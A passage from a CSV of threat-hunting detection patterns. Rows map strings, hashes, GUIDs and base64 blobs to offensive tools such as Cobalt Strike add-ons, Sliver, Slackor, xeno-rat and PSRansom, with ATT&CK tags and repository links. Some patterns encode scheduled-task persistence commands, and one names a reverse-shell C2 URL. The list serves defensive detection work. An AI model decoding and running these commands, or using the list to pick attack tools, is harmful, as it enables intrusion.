- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*C2ListenerPort*",".{0,1000}C2ListenerPort.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*c2-logs.txt*",".{0,1000}c2\-logs\.txt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" 
"*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBEQUlMWQ.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0*",".{0,1000}c2NodGFza3MgL2NyZWF0ZSAvdG4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC90ciAid3NjcmlwdCAlQVBQREFUQSVcV2luZG93czp3aW5ybS52YnMiIC9zYyBPTlNUQVJUIC9ydSBzeXN0ZW0.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m*",".{0,1000}c2NodGFza3MgL2RlbGV0ZSAvVE4gIk9uZURyaXZlIFN0YW5kYWxvbmUgVXBkYXRlIFRhc2siIC9m.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c2profile.profile*",".{0,1000}c2profile\.profile.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*C2ProfileManager.*",".{0,1000}C2ProfileManager\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*C2ProfileResponse.cs*",".{0,1000}C2ProfileResponse\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*-c2-randomizer.py*",".{0,1000}\-c2\-randomizer\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*C2ReverseClint*",".{0,1000}C2ReverseClint.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2ReverseProxy*",".{0,1000}C2ReverseProxy.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2ReverseServer*",".{0,1000}C2ReverseServer.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2script/proxy.*",".{0,1000}C2script\/proxy\..{0,1000}","offensive_tool_keyword","cobaltstrike","A tool that can perform reverse proxy and cs online without going online","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2Server by @JoelGMSec*",".{0,1000}C2Server\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. 
you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*'c2server'*",".{0,1000}\'c2server\'.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*C2Server.cs*",".{0,1000}C2Server\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
"*c2-server.mtattab.com/reverseShellClients*",".{0,1000}c2\-server\.mtattab\.com\/reverseShellClients.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*C2Server.ps1*",".{0,1000}C2Server\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","C2","https://github.com/JoelGMSec/PSRansom","1","1","N/A","10","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*c2server_arm_musl*",".{0,1000}c2server_arm_musl.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_armv7*",".{0,1000}c2server_armv7.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_debug*",".{0,1000}c2server_debug.{0,1000}","offensive_tool_keyword","REC2 
","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_linux*",".{0,1000}c2server_linux.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_macos*",".{0,1000}c2server_macos.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_release*",".{0,1000}c2server_release.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2server_windows*",".{0,1000}c2server_windows.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*c2-sessions ping*",".{0,1000}c2\-sessions\sping.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*c2-sessions quit*",".{0,1000}c2\-sessions\squit.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*C2TaskMessage.*",".{0,1000}C2TaskMessage\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*c2VydmVyMS5jaWEuZ292*",".{0,1000}c2VydmVyMS5jaWEuZ292.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*C2WebSocketHandler.*",".{0,1000}C2WebSocketHandler\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6*",".{0,1000}c33226c3905c340a634103a8868f968efc84ec2c8bf441df2713305979c3b0c6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908*",".{0,1000}c336fabf158958c6946e05e28320ce520adab0ee3ccc7e1bc616179d1ece1908.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036*",".{0,1000}c33fcbfbaf33ff5ed81591bbb65211e30e274e0c25b04b41cd8640df384be036.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*C34208EA-8C33-473D-A9B4-53FB40347EA0*",".{0,1000}C34208EA\-8C33\-473D\-A9B4\-53FB40347EA0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e*",".{0,1000}c34330f0c27945471126e4ceac5ccea50d2d47584bbc3252351aeff4dd40400e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*C346B912-51F2-4A2E-ACC3-0AC2D28920C6*",".{0,1000}C346B912\-51F2\-4A2E\-ACC3\-0AC2D28920C6.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8*",".{0,1000}c35358989279835340cc632ab21e9e01c0d97415b4c6ac0e7f95fd2e916700c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b*",".{0,1000}c35aa7deb47b8e355ef827011cc745183d0099c36345e7f177d024618862873b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf*",".{0,1000}c36e5e59c3faf245d1cbeb5bf81bdee52eb7d49ff777813e45b33390575072bf.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*C373A937-312C-4C8D-BD04-BAAF568337E7*",".{0,1000}C373A937\-312C\-4C8D\-BD04\-BAAF568337E7.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*C37637FC-3792-4354-8F5B-7E319E4E5A6D*",".{0,1000}C37637FC\-3792\-4354\-8F5B\-7E319E4E5A6D.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1*",".{0,1000}c3a499f047b670e888a41b33749ffc9227b7b0bcc4e9f0882d272918ee3a17d1.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. 
Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd*",".{0,1000}c3a9123c48f1c7024efc87373bf3471e9ee2e5dcdddce594764f21d3123f9cbd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 